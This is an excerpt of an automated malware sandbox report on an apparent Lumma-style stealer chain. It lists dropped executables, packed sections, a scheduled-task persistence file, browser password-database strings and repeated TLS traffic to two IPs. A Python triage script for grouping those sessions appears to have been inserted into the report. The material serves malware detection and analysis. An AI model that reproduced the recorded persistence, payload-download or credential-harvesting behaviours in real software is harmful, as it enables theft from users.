Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: cfc45d1c7c.exe, 0000000C.00000003.2899797959.0000000005B58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: cfc45d1c7c.exe, 0000000C.00000003.2899797959.0000000005B58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: cfc45d1c7c.exe, 0000000A.00000003.2720320103.0000000005B69000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2899797959.0000000005B58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: cfc45d1c7c.exe, 0000000C.00000003.2899797959.0000000005B58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: firefox.exe, 0000001F.00000002.2929336192.000001994D4CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2928726607.000001B63A0CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001F.00000002.2929336192.000001994D4CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/O)NM
Source: cfc45d1c7c.exe, 0000000A.00000003.2720320103.0000000005B69000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2899797959.0000000005B58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2858834589.0000481C024C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: firefox.exe, 0000001C.00000002.2836535538.000001D78E9B0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2928265482.000001994D290000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2928265482.000001994D29A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2938789773.000001994D574000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2925762375.000001B639BCA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2928043417.000001B639FD4000.00000004.00000020.00020000.00000000.sdmp, 064deba48e.exe, 00000022.00000003.2976246862.00000000008D4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3009556207.000001ACFACC0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3047503720.000002086BD5E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3113524727.0000020877B26000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3045442687.000002086BB20000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 0000001B.00000002.2820741712.000002D369807000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2836535538.000001D78E9C0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3009556207.000001ACFACC9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 0000001F.00000002.2928265482.000001994D29A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd8
Source: firefox.exe, 0000001F.00000002.2928265482.000001994D290000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2938789773.000001994D574000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2928043417.000001B639FD4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2925762375.000001B639BC0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3053234298.000002086D9F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49920
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49905
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown HTTPS traffic detected: 104.21.85.146:443 -> 192.168.2.4:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49820 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49827 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49832 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49837 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49845 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49851 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49858 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49863 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49868 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49887 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49891 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49895 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49905 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49920 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49936 version: TLS 1.2
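The sixteen "HTTPS traffic detected" rows above are easier to read as a per-server table: fifteen of the sixteen TLS 1.2 sessions go to a single address on steadily rising client ports, which is what a polling C2 looks like in a short sandbox run. The script below is an added example, not Joe Sandbox code. Its SAMPLE text is copied from the rows above; CDN_PREFIXES is an abbreviated, hand-entered list of two Cloudflare prefixes that cover these two addresses (an assumption to refresh from Cloudflare's published ranges before relying on it), and beacon_threshold is an arbitrary triage cut-off, not a report setting.

```python
"""Group the report's TLS session rows by server and flag CDN-fronted, beacon-like hosts.
Added example, not Joe Sandbox code. CDN_PREFIXES and beacon_threshold are assumptions."""
import ipaddress
import re
from collections import defaultdict

TLS_LINE = re.compile(
    r"HTTPS traffic detected: ([\d.]+):(\d+) -> ([\d.]+):(\d+) version: (TLS [\d.]+)")

# Assumption: two Cloudflare prefixes that cover the addresses in this report.
# Refresh from Cloudflare's published IP list before using this in production.
CDN_PREFIXES = [ipaddress.ip_network(p) for p in ("104.16.0.0/12", "172.64.0.0/13")]

# Copied from the report rows above (sample input for the demo).
SAMPLE = """\
Source: unknown HTTPS traffic detected: 104.21.85.146:443 -> 192.168.2.4:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49820 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49827 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49832 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49837 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49845 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49851 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49858 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49863 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49868 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49887 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49891 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49895 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49905 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49920 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49936 version: TLS 1.2
"""


def parse_tls_sessions(text: str) -> list:
    """One dict per 'HTTPS traffic detected' row; every other report row is ignored."""
    return [
        {"server": m[1], "sport": int(m[2]), "client": m[3], "cport": int(m[4]), "tls": m[5]}
        for m in TLS_LINE.finditer(text)
    ]


def is_cdn_fronted(ip: str) -> bool:
    """True when the server sits in one of the (assumed) CDN prefixes above."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in CDN_PREFIXES)


def summarize(sessions: list, beacon_threshold: int = 5) -> dict:
    """Group sessions by server. Repeated short-lived sessions to one host within a
    single sandbox run are beacon-like; a CDN-fronted server means the IP alone is
    a weak indicator and the SNI/hostname should be used for blocking instead."""
    by_server = defaultdict(list)
    for s in sessions:
        by_server[s["server"]].append(s)
    summary = {}
    for server, rows in by_server.items():
        summary[server] = {
            "sessions": len(rows),
            "client_ports": sorted(r["cport"] for r in rows),
            "tls_versions": sorted({r["tls"] for r in rows}),
            "cdn_fronted": is_cdn_fronted(server),
            "beacon_like": len(rows) >= beacon_threshold,
        }
    return summary


if __name__ == "__main__":
    for server, info in summarize(parse_tls_sessions(SAMPLE)).items():
        print(server, info)
```

Run it against a saved copy of the report's network section to get the same summary for other samples; only the "HTTPS traffic detected" rows are consumed, so the "HTTP traffic on port" rows can stay in the input.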

System Summary

Source: 064deba48e.exe, 0000000D.00000002.2856707163.0000000000B02000.00000002.00000001.01000000.0000000E.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_6cee4430-3
Source: 064deba48e.exe, 0000000D.00000002.2856707163.0000000000B02000.00000002.00000001.01000000.0000000E.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_2e93fc50-e
Source: 064deba48e.exe, 00000022.00000002.3021178012.0000000000B02000.00000002.00000001.01000000.0000000E.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_7268d122-7
Source: 064deba48e.exe, 00000022.00000002.3021178012.0000000000B02000.00000002.00000001.01000000.0000000E.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_f5d59a9d-e
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .rsrc
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: ae87049195.exe.6.dr Static PE information: section name:
Source: ae87049195.exe.6.dr Static PE information: section name: .rsrc
Source: ae87049195.exe.6.dr Static PE information: section name: .idata
Source: ae87049195.exe.6.dr Static PE information: section name:
Source: c8a61f4196.exe.6.dr Static PE information: section name:
Source: c8a61f4196.exe.6.dr Static PE information: section name: .idata
Source: Lumma111[1].exe.6.dr Static PE information: section name:
Source: Lumma111[1].exe.6.dr Static PE information: section name: .idata
Source: Lumma111[1].exe.6.dr Static PE information: section name:
Source: Lumma111.exe.6.dr Static PE information: section name:
Source: Lumma111.exe.6.dr Static PE information: section name: .idata
Source: Lumma111.exe.6.dr Static PE information: section name:
Source: random[1].exe1.6.dr Static PE information: section name:
Source: random[1].exe1.6.dr Static PE information: section name: .idata
Source: random[1].exe1.6.dr Static PE information: section name:
Source: cfc45d1c7c.exe.6.dr Static PE information: section name:
Source: cfc45d1c7c.exe.6.dr Static PE information: section name: .idata
Source: cfc45d1c7c.exe.6.dr Static PE information: section name:
Source: random[1].exe2.6.dr Static PE information: section name:
Source: random[1].exe2.6.dr Static PE information: section name: .idata
Source: random[1].exe2.6.dr Static PE information: section name:
Source: 686764db73.exe.6.dr Static PE information: section name:
Source: 686764db73.exe.6.dr Static PE information: section name: .idata
Source: 686764db73.exe.6.dr Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000AE530 6_2_000AE530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000E7049 6_2_000E7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000E8860 6_2_000E8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000E78BB 6_2_000E78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000E2D10 6_2_000E2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000E31A8 6_2_000E31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000A4DE0 6_2_000A4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000A4B30 6_2_000A4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000D7F36 6_2_000D7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000E779B 6_2_000E779B
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9979883344686649
Source: file.exe Static PE information: Section: hwqxmwlo ZLIB complexity 0.9945905089009288
Source: skotes.exe.0.dr Static PE information: Section: ZLIB complexity 0.9979883344686649
Source: skotes.exe.0.dr Static PE information: Section: hwqxmwlo ZLIB complexity 0.9945905089009288
Source: random[1].exe.6.dr Static PE information: Section: mouszfiw ZLIB complexity 0.9943214903303218
Source: ae87049195.exe.6.dr Static PE information: Section: mouszfiw ZLIB complexity 0.9943214903303218
Source: Lumma111[1].exe.6.dr Static PE information: Section: ZLIB complexity 0.9973764954620462
Source: Lumma111[1].exe.6.dr Static PE information: Section: ucbvvkym ZLIB complexity 0.9947109233895244
Source: Lumma111.exe.6.dr Static PE information: Section: ZLIB complexity 0.9973764954620462
Source: Lumma111.exe.6.dr Static PE information: Section: ucbvvkym ZLIB complexity 0.9947109233895244
Source: random[1].exe1.6.dr Static PE information: Section: ZLIB complexity 0.9974409550330033
Source: random[1].exe1.6.dr Static PE information: Section: akxghhwi ZLIB complexity 0.994061902397764
Source: cfc45d1c7c.exe.6.dr Static PE information: Section: ZLIB complexity 0.9974409550330033
Source: cfc45d1c7c.exe.6.dr Static PE information: Section: akxghhwi ZLIB complexity 0.994061902397764
Source: random[1].exe2.6.dr Static PE information: Section: lgjpmlrc ZLIB complexity 0.994951031259183
Source: 686764db73.exe.6.dr Static PE information: Section: lgjpmlrc ZLIB complexity 0.994951031259183
Source: Lumma111.exe.6.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[1].exe.6.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: Lumma111[1].exe.6.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: ae87049195.exe.6.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@75/21@17/9
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5728:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:412:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3888:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6028:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5240:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1012:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5700:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3340:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4340:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5844:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: chrome.exe, 00000010.00000002.2867116060.0000481C028BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: cfc45d1c7c.exe, 0000000A.00000003.2670036587.0000000005A5A000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2669670593.0000000005A76000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2830718067.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2829134469.0000000005A68000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 52%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: Lumma111.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
